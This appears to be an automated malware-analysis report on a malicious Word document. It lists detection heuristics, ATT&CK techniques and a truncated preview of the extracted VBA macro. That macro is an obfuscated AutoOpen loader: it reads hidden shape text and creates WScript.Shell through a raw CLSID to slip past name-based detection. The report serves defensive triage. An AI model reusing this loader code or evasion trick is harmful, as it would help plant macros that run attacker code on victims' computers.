MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1218.011 System Binary Proxy Execution: Rundll32
T1059.003 Windows Command Shell
The sample contains a critical heuristic firing for instantiating the dangerous COM class 'WScript.Shell' via its CLSID. The AutoOpen VBA macro is present and likely attempts to execute commands or download additional payloads. The presence of 'WScript.Shell' and the AutoOpen macro strongly suggest an attempt to execute arbitrary code.
Heuristics 7
-
ClamAV: Doc.Malware.Powload-6826398-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Powload-6826398-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA instantiates a dangerous COM class by CLSID critical OLE_VBA_GETOBJECT_CLSID_DANGEROUSVBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6864 bytes |
SHA-256: 9919beb3755bd4a9f8b5bf1737e16be57d0380ea3d20b23e692f2063a020b56a |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "BzODzkBN"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Select Case DNwiwGc
Case 110562042
DjJAj = CBool(TjZVff)
afYsjf = 199118286
Case 120143625
QffEv = Atn(KJooWPo)
kznXhq = Atn(117020577 * CLng(122217114))
End Select
For Each zjmTJDW In moBQiUcQr
QhrJElQ = uwIwbkzB * CDate(UJHAGRrj * nwGdKGq) * BlnpiA / Sin(WIaop) / QScoHH + 232769689 - 138574424 + Chr(66955860) + (zZiwRj * lBGHiM)
Next
On Error Resume Next
Select Case sZOGIrlu
Case 326949927
FAHVjV = CBool(OYwJJtLw)
bXuMfnq = 308315021
Case 337489584
WjrYcwOju = Atn(zihKCqQq)
jfCJfPN = Atn(2016227 * CLng(243991620))
End Select
For Each RKMWmwBX In TNvJQRjtp
KoWzXQPT = LJOvdAc * CDate(kMvMAT * XKnVlr) * WYQauuLpG / Sin(fbLpERS) / nwvhu + 155972209 - 60166520 + Chr(140540184) + (bNcth * MmqfCFiI)
Next
On Error Resume Next
Select Case zMmkj
Case 295643358
TctjhIY = CBool(GEIsG)
NHCiL = 71604706
Case 178241520
VzNEq = Atn(BzfXM)
hwcGBF = Atn(39082547 * CLng(26556637))
End Select
For Each DXrhFj In kBUiz
HwWdRS = GYlfr * CDate(PivjFEX * SZWWkVvPi) * iQWrj / Sin(YomAGimL) / jUaoUOda + 102365760 - 269160415 + Chr(147773796) + (GjzHruiBa * XzKIRRWpn)
Next
On Error Resume Next
Select Case EiBSREr
Case 325842126
rqljBawsb = CBool(FzwJKdrcq)
UmiaA = 322803614
Case 3130424
GOsvSoDI = Atn(LTMiwiiXa)
ZqpZc = Atn(8554190 * CLng(301751895))
End Select
For Each EHKjEaI In NBKhJGBi
IdZWDzCZ = bwQoPuYMw * CDate(ofOlV * VhNtwS) * LtTXUFBI / Sin(GNzLU) / lQIwHAp + 334188 - 303112609 + Chr(290623796) + (JiSpj * IIFuwWEGz)
Next
Set qIEizqDtN = Shapes("VzjnhsrIM")
On Error Resume Next
Select Case IobOq
Case 243120048
bIiur = CBool(kZBmNGkj)
qNpXcrNCG = 163039656
Case 211696002
HoJomzB = Atn(zMzhqEh)
BsvfaK = Atn(324205783 * CLng(91393562))
End Select
For Each TIJOGYV In Oclswb
jMwiP = jXKzB * CDate(dAvzqv * TprJso) * WccvYCR / Sin(wOMTwQmk) / RFKsLSfuw + 226151421 - 52459493 + Chr(122108316) + (CFpnlEvPY * wqDjlXzzj)
Next
GMHWrbwzU = "" + UFLGd + ndjLJwAb + ipjsHOB + qIEizqDtN.TextFrame.TextRange.Text + uWwiaNz + LDauwO
On Error Resume Next
Select Case lwVWVv
Case 237648596
rDPpUr = CBool(fPLYnDC)
CsInBQXG = 57381375
Case 126063267
BUmhRvlb = Atn(YQUvXzhw)
ZBHjJS = Atn(198563354 * CLng(91908911))
End Select
For Each iDUzG In fpItitd
cQOmX = PCjZpj * CDate(iSKTDD * DXRaJwQi) * oQXvziSvj / Sin(BrjUu) / XEzWz + 167871519 - 199837746 + Chr(271242100) + (wEwocZwhL * IRnSDzPnz)
Next
Set lOUdzj = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + WDXSmtTMt + liGAaT + DjFKV + lqjltWh)
On Error Resume Next
Select Case CTRqY
Case 19269407
qJaXpu = CBool(XDfFDRmV)
DnYUPUuzj = 149632523
Case 125943163
pIwmZ = Atn(FCzCCqbi)
KwqwVjZ = Atn(89050481 * CLng(22134342))
End Select
For Each hBVPc In TblhvjSd
jTwBkht = vjztZzUQ * CDate(vmrnknUPj * qwdifN) * pNcMST / Sin(QafdttdR) / Aljlpw + 213605158 - 182501544 + Chr(250228584) + (SCoRF * jGIGni)
Next
On Error Resume Next
Select Case cPamI
Case 74826956
QvziiH = CBool(PNzLk)
sLFIQJGU = 51358557
Case 112378627
NnJKFks = Atn(zvSWn)
BJHQQKcbk = Atn(80304901 * CLng(115112302))
End Select
For Each SVwFzI In dVvwsKd
Anqao = ROAwDr * CDate(slDzs * SWLszJsJV) * LOGnD / Sin(otmdtAG) / GuRYljsBz + 101982266 - 71565132 + Chr(245146613) + (vtQwHwIp *
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.